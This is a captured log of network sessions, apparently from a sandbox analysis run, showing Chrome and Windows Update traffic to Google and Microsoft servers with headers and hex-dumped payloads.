2025-06-19 10:59:11 UTC	561	OUT	GET /crx/blobs/AcpJF5hs0RaqlioRST5VUdtZtuwf-dtJSfgqDkrwCkFWRrggle--sEu-T-tqm1TV9gMsnGlbs2Z2JiXXVNN-aAHshVgF5tQXk3Qd_r_UT3EI3EXBGNdI6NK17spagGg11xsAxlKa5clZJBI2OABMYJC6zInaqqGOBt_E/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_93_1_0.crx HTTP/1.1 host: clients2.googleusercontent.com sec-fetch-site: none sec-fetch-mode: no-cors sec-fetch-dest: empty user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept-encoding: identity accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=1, i
2025-06-19 10:59:11 UTC	551	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABgVH88tHvcB6sHw__5SOeNRnzaqbFhLenlc2BBDofqXcRYC7_Q9nZCP1OztOmYCrxWwBJ_8ltH_zAQ accept-ranges: bytes content-length: 159915 x-goog-hash: crc32c=+PqStw== server: UploadServer date: Wed, 18 Jun 2025 14:07:11 GMT expires: Thu, 18 Jun 2026 14:07:11 GMT cache-control: public, max-age=31536000 age: 75120 last-modified: Mon, 16 Jun 2025 14:07:04 GMT etag: d1b9fbc5_0a1a135f_20d98565_babdbcba_cafc9a43 content-type: application/x-chrome-extension alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49707	142.250.80.78	443	7808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:58:56 UTC	675	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.citSWp3NP7U.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xL6HUJcSIDSbTUlNBOsamhv5RMA/cb=gapi.loaded_0 HTTP/1.1 host: apis.google.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / x-client-data: CMHxygE= sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active accept-encoding: identity accept-language: en-GB,en-US;q=0.9,en;q=0.8
2025-06-19 10:58:56 UTC	896	IN	HTTP/1.1 200 OK accept-ranges: bytes access-control-allow-origin: * content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access cross-origin-resource-policy: cross-origin cross-origin-opener-policy: same-origin; report-to="social-frontend-mpm-access" report-to: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} content-length: 117262 x-content-type-options: nosniff server: sffe x-xss-protection: 0 date: Wed, 18 Jun 2025 19:35:00 GMT expires: Thu, 18 Jun 2026 19:35:00 GMT cache-control: public, max-age=31536000 last-modified: Tue, 06 May 2025 22:41:32 GMT content-type: text/javascript; charset=UTF-8 vary: Accept-Encoding age: 55436 alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 64 61 2c 68 61 2c 6c 61 2c 70 61 2c 74 61 2c 76 61 2c 44 61 2c 45 61 3b 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var da,ha,la,pa,ta,va,Da,Ea;da=function(a){v
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72 61 79 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 63 3d 30 3b 63 3c 62 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 5f 2e 6e 61 5b 62 5b 63 5d 5d 3b 74 79 70 65 6f 66 20 64 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 64 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 68 61 28 64 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 61 28 64 61 28 74 68 69 Data Ascii: 16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=_.na[b[c]];typeof d==="function"&&typeof d.prototype[a]!="function"&&ha(d.prototype,a,{configurable:!0,writable:!0,value:function(){return ta(da(thi
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 61 6e 63 65 6f 66 20 65 3f 68 3a 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 28 68 29 7d 29 7d 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 50 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 69 66 28 74 68 69 73 2e 41 66 3d 3d 6e 75 6c 6c 29 7b 74 68 69 73 2e 41 66 3d 5b 5d 3b 76 61 72 20 6b 3d 74 68 69 73 3b 74 68 69 73 2e 41 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 2e 56 38 28 29 7d 29 7d 74 68 69 73 2e 41 66 2e 70 75 73 68 28 68 29 7d 3b 76 61 72 20 64 3d 5f 2e 6e 61 2e 73 65 74 54 69 6d 65 6f 75 74 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 41 50 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 64 28 68 2c 30 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 56 38 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e Data Ascii: anceof e?h:new e(function(k){k(h)})}if(a)return a;b.prototype.zP=function(h){if(this.Af==null){this.Af=[];var k=this;this.AP(function(){k.V8()})}this.Af.push(h)};var d=_.na.setTimeout;b.prototype.AP=function(h){d(h,0)};b.prototype.V8=function(){for(;this.
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 7d 2c 0a 31 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 70 64 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 61 57 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 68 3d 5f 2e 6e 61 2e 43 75 73 74 6f 6d 45 76 65 6e 74 2c 6b 3d 5f 2e 6e 61 2e 45 76 65 6e 74 2c 6c 3d 5f 2e 6e 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 74 79 70 65 6f 66 20 6c 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 21 30 3b 74 79 70 65 6f 66 20 68 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 Data Ascii: },1)};e.prototype.pda=function(){if(this.aW)return!1;var h=_.na.CustomEvent,k=_.na.Event,l=_.na.dispatchEvent;if(typeof l==="undefined")return!0;typeof h==="function"?h=new h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledr
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 3b 72 2d 2d 3b 72 3d 3d 30 26 26 6d 28 71 29 7d 7d 76 61 72 20 71 3d 5b 5d 2c 72 3d 30 3b 64 6f 20 71 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 72 2b 2b 2c 63 28 6c 2e 76 61 6c 75 65 29 2e 77 79 28 70 28 71 2e 6c 65 6e 67 74 68 2d 0a 31 29 2c 6e 29 2c 6c 3d 6b 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6c 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b Data Ascii: ;r--;r==0&&m(q)}}var q=[],r=0;do q.push(void 0),r++,c(l.value).wy(p(q.length-1),n),l=k.next();while(!l.done)})};return e});var Ia=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 44 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 44 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 44 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 44 61 5d 3a 76 6f 69 64 20 30 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 Data Ascii: =m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!Da(l,f))throw Error("f`"+l);l[f][this.Da]=m;return this};k.prototype.get=function(l){return c(l)&&Da(l,f)?l[f][this.Da]:void 0};k.prototype.has=function(l){ret
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 4c 6b 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 56 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 28 6b 3d 64 28 74 68 69 73 2c 6b 29 2e 56 65 29 26 26 6b 2e 76 61 6c 75 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 5b 6b 2e 6b 65 79 Data Ascii: .prototype.clear=function(){this[0]={};this[1]=this[1].Lk=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).Ve};c.prototype.get=function(k){return(k=d(this,k).Ve)&&k.value};c.prototype.entries=function(){return e(this,function(k){return[k.key
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 21 3d 34 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 68 69 73 2e 53 61 3d 6e 65 77 20 4d 61 70 3b 69 66 28 63 29 7b 63 3d 0a 5f 2e 41 61 28 63 29 3b 66 6f 72 28 76 61 72 20 64 3b 21 28 64 3d 63 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 64 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 53 61 2e 73 69 7a 65 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 Data Ascii: ();return f.done\|\|f.value[0]==c\|\|f.value[0].x!=4\|\|f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var b=function(c){this.Sa=new Map;if(c){c=_.Aa(c);for(var d;!(d=c.next()).done;)this.add(d.value)}this.size=this.Sa.size};b.prototype
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 3e 35 36 33 31 39 7c 7c 62 2b 31 3d 3d 3d 64 29 72 65 74 75 72 6e 20 65 3b 62 3d 63 2e 63 68 61 72 43 6f 64 65 41 74 28 62 2b 31 29 3b 72 65 74 75 72 6e 20 62 3c 35 36 33 32 30 7c 7c 62 3e 35 37 33 34 33 3f 65 3a 28 65 2d 35 35 32 39 36 29 2a 31 30 32 34 2b 62 2b 39 32 31 36 7d 7d 7d 29 3b 0a 70 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e Data Ascii: >56319\|\|b+1===d)return e;b=c.charCodeAt(b+1);return b<56320\|\|b>57343?e:(e-55296)*1024+b+9216}}});pa("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.
2025-06-19 10:58:56 UTC	1460	IN	Data Raw: 6f 6c 76 65 28 62 28 29 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 63 3b 7d 29 7d 29 7d 7d 29 3b 70 61 28 22 4f 62 6a 65 63 74 2e 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 62 3d 3d 3d 63 3f 62 21 3d 3d 30 7c 7c 31 2f 62 3d 3d 3d 31 2f 63 3a 62 21 3d 3d 62 26 26 63 21 3d 3d 63 7d 7d 29 3b 0a 70 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 76 Data Ascii: olve(b()).then(function(){throw c;})})}});pa("Object.is",function(a){return a?a:function(b,c){return b===c?b!==0\|\|1/b===1/c:b!==b&&c!==c}});pa("Array.prototype.includes",function(a){return a?a:function(b,c){var d=this;d instanceof String&&(d=String(d));v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49709	142.250.80.78	443	7808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:58:57 UTC	515	OUT	OPTIONS /log?format=json&hasfast=true HTTP/1.1 host: play.google.com accept: / access-control-request-method: POST access-control-request-headers: content-encoding,content-type origin: chrome-untrusted://new-tab-page user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-fetch-mode: cors sec-fetch-site: cross-site sec-fetch-dest: empty accept-encoding: identity accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=1, i
2025-06-19 10:58:57 UTC	519	IN	HTTP/1.1 200 OK access-control-allow-origin: chrome-untrusted://new-tab-page access-control-allow-methods: GET, POST, OPTIONS access-control-max-age: 86400 access-control-allow-credentials: true access-control-allow-headers: X-Playlog-Web,authorization,content-encoding,content-type,origin content-type: text/plain; charset=UTF-8 date: Thu, 19 Jun 2025 10:58:57 GMT server: Playlog content-length: 0 x-xss-protection: 0 x-frame-options: SAMEORIGIN alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49710	142.250.80.78	443	7808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:58:57 UTC	681	OUT	POST /log?format=json&hasfast=true HTTP/1.1 host: play.google.com content-length: 371 sec-ch-ua-platform: "Windows" content-encoding: gzip user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" content-type: application/binary sec-ch-ua-mobile: ?0 accept: / origin: chrome-untrusted://new-tab-page x-client-data: CMHxygE= sec-fetch-site: cross-site sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active accept-encoding: identity accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=1, i
2025-06-19 10:58:57 UTC	371	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 0a d5 94 4d 6b c2 40 10 86 ff 4a 99 f3 24 cc ec 67 b6 37 ed 41 0a 6d 69 a9 a5 c8 66 0f 4a 12 1b d0 04 6c c5 fe fc 12 83 62 d5 62 0a 0a ed 65 58 66 df f9 d8 d9 87 f1 9e b1 5a ce 66 9d 8d ef 2c f4 1e 6e de 16 f5 bc 5c ce 01 81 a5 82 80 1e 1e ea 8f eb 5e d4 5f 8c ab 0c 10 44 eb 1c d4 f5 74 96 5f ad e5 f9 46 1c 90 10 5e cb 2a ab 57 ef 8d 8f 62 8a 09 10 3e 13 03 08 ad 2a a6 d8 38 97 c4 d2 34 79 18 29 84 80 d2 4a f4 1e d8 6a 92 92 ac d4 c6 69 38 d1 2d 78 46 45 8a 08 85 92 ad 2b 05 6b 39 61 91 18 1d 53 0a 98 c2 24 e2 e1 f8 76 b8 ea 8f 26 a3 f2 ee fe 51 65 d5 74 f5 b4 4a 0f 92 a7 90 57 d1 a0 bf 0e 7a 79 ee a5 80 84 16 59 92 6a ef 09 69 23 ac a7 91 c9 29 2f 5c 66 22 ad 27 22 52 89 49 22 97 15 32 32 85 b6 85 2a 4c 21 c6 f9 61 8d 33 9a 5f Data Ascii: Mk@J$g7AmifJlbbeXfZf,n\^_Dt_F^Wb>84y)Jji8-xFE+k9aS$v&QetJWzyYji#)/\f"'"RI"22*L!a3_
2025-06-19 10:58:57 UTC	911	IN	HTTP/1.1 200 OK access-control-allow-origin: chrome-untrusted://new-tab-page cross-origin-resource-policy: cross-origin access-control-allow-credentials: true access-control-allow-headers: X-Playlog-Web set-cookie: NID=525=n84QLCadYbpMo2Mo_F62tUo7kZVYIPda2R7_ghdKiBaqiSrX9fxS-PKgVyy4kkCFegoEOs7YZ4jseeSJHPSagdSjSLiVvCTGLOVfDAv5N36LTEHuvamq5G0WHgDAzNYFA2AVPcC-O12GbwgBM_RJ-ifUW6PLFtDgrCHC6TXSfbxqxt5mJSJITcw7jW5_0TVJJHm0YZY; expires=Fri, 19-Dec-2025 10:58:57 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info." content-type: text/plain; charset=UTF-8 content-encoding: gzip date: Thu, 19 Jun 2025 10:58:57 GMT server: Playlog content-length: 131 x-xss-protection: 0 x-frame-options: SAMEORIGIN alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 expires: Thu, 19 Jun 2025 10:58:57 GMT cache-control: private
2025-06-19 10:58:57 UTC	131	IN	Data Raw: 1f 8b 08 00 00 00 00 00 02 ff 3d 8a 31 0a c3 30 0c 45 ef a2 59 01 db b2 31 e9 a6 34 19 4a 69 52 6c 75 28 42 f8 02 21 5b a7 d2 bb 37 81 d2 37 7d de 7f 0a 9d 07 dc 5e eb 8a aa 0a 3c 8f 65 b9 8c 6d e0 f3 f5 71 07 74 86 0a 03 8b 4c e5 d9 aa b0 d4 9f ab 37 2e d2 ea 24 ff 4a ca 32 1f d3 b0 23 a2 98 29 a7 3e ba 10 fb ec 43 48 7b 61 f8 06 9f 53 a0 e3 82 93 7a b7 63 1f fb 02 0a fb aa a7 83 00 00 00 Data Ascii: =10EY14JiRlu(B![77}^<emqtL7.$J2#)>CH{aSzc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49715	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2025-06-19 10:59:24 UTC	309	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tlSuF3oHAXZy8GK&MD=YHsdUPEh HTTP/1.1 host: slscr.update.microsoft.com accept: / user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 accept-encoding: identity
2025-06-19 10:59:24 UTC	558	IN	HTTP/1.1 200 OK content-type: application/octet-stream date: Thu, 19 Jun 2025 10:59:24 GMT cache-control: no-cache etag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" expires: -1 last-modified: Mon, 01 Jan 0001 00:00:00 GMT pragma: no-cache content-length: 30005 slsversion: 2.0 ms-correlationid: f50f3c6b-f978-4728-ac71-867252fdba0d ms-requestid: 4897a40a-29f5-4409-8c9d-c61712bfc795 ms-cv: u9QM+N7Nf0GWjnzs.0 x-content-type-options: nosniff x-microsoft-slsclientcache: 1440 content-disposition: attachment; filename=environment.cab
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: 25 dc 93 6a 9f d2 e0 c1 ea a0 79 31 c4 ab 34 9c e1 43 a8 b3 7e 55 3a 43 6e 5b 8c bc 1c ac b5 c5 db f6 d5 6b 9a 98 b7 61 91 ec 20 ed 8b 6b 6b 17 65 25 d4 6a aa b6 ca 84 bd 36 98 48 0e 5e cd 7c b0 80 4f 8a 29 1a bd 79 0a 95 15 94 2c 8d 46 d3 90 66 2a a1 20 71 50 9b 63 14 ba 66 53 25 93 57 c9 de 70 e3 0a f9 95 e5 f6 30 46 8b 99 e7 52 08 31 34 2a fb 7b 19 1f 7d d2 b0 1d 12 db 90 d7 13 2b 94 d3 2c 24 3c da 5c c7 eb 72 6a b9 b9 58 16 5c 90 d7 e5 cd 92 95 32 0d 6b cf 04 8d 4e 78 08 6b 05 10 2b 3f 35 f1 9b 05 cf 25 b3 f8 b8 80 45 47 a6 3f 98 fb 9d 6d bb 59 60 bf 35 2a 6a 71 da 05 32 46 9c 40 06 81 a2 d0 24 13 09 4e 44 ad c8 6d e0 34 6a 19 a9 18 60 e4 00 e9 b7 1d ae 08 07 c3 31 50 c7 68 68 e8 50 28 40 75 d8 01 17 46 0a 23 66 bd 70 60 ba 6d fe d2 9a c3 39 9c fb a0 Data Ascii: %jy14C~U:Cn[ka kke%j6H^\|O)y,Ff* qPcfS%Wp0FR14{}+,$<\rjX\2kNxk+?5%EG?mY`5jq2F@$NDm4j`1PhhP(@uF#fp`m9
2025-06-19 10:59:24 UTC	1460	IN	Data Raw: 88 13 d2 ca b4 06 b4 39 d4 f9 dc 75 86 ec f8 71 28 61 7c 4c c7 63 c8 ea 15 e7 75 7d 6d 29 70 2a 71 c0 e4 ec e9 97 37 59 2c ef da 63 ae b1 f3 e5 0b 3b cf df 39 d7 39 fa 82 03 6e ce 5d df 9a 7e b1 21 8c f5 e5 b9 a1 86 fb 42 cd 8f 80 65 85 b7 9b da 6d 66 ca ea e3 34 46 3b 0d 3a b7 43 5e 3d 7a 57 67 f5 fc 5c 06 83 b4 c2 d8 63 75 21 29 ed dd c1 86 8d 5d 43 f3 49 fd 3d 76 02 f5 6a 5c 57 4b 0c 0f 16 4c dc ae 2c 6b d6 f7 77 f2 a8 5d 45 e3 67 7b 15 83 04 9a 73 32 62 e8 67 d8 7e c1 4c 27 14 66 da 01 f8 70 cc af 50 49 02 86 a1 cc 11 74 0c 24 7f 15 ad 28 be 9d 40 0c 81 9d a0 c6 02 69 80 3c 40 a6 20 29 90 04 80 7d 78 26 1e ec 70 98 20 80 f0 1b 08 60 00 70 d4 d7 e1 d0 c7 a1 d0 95 43 18 82 b8 25 55 45 8c a6 3c b1 98 db 86 78 7d 26 94 17 d0 3b 82 42 0d 40 0d 50 49 53 4a Data Ascii: 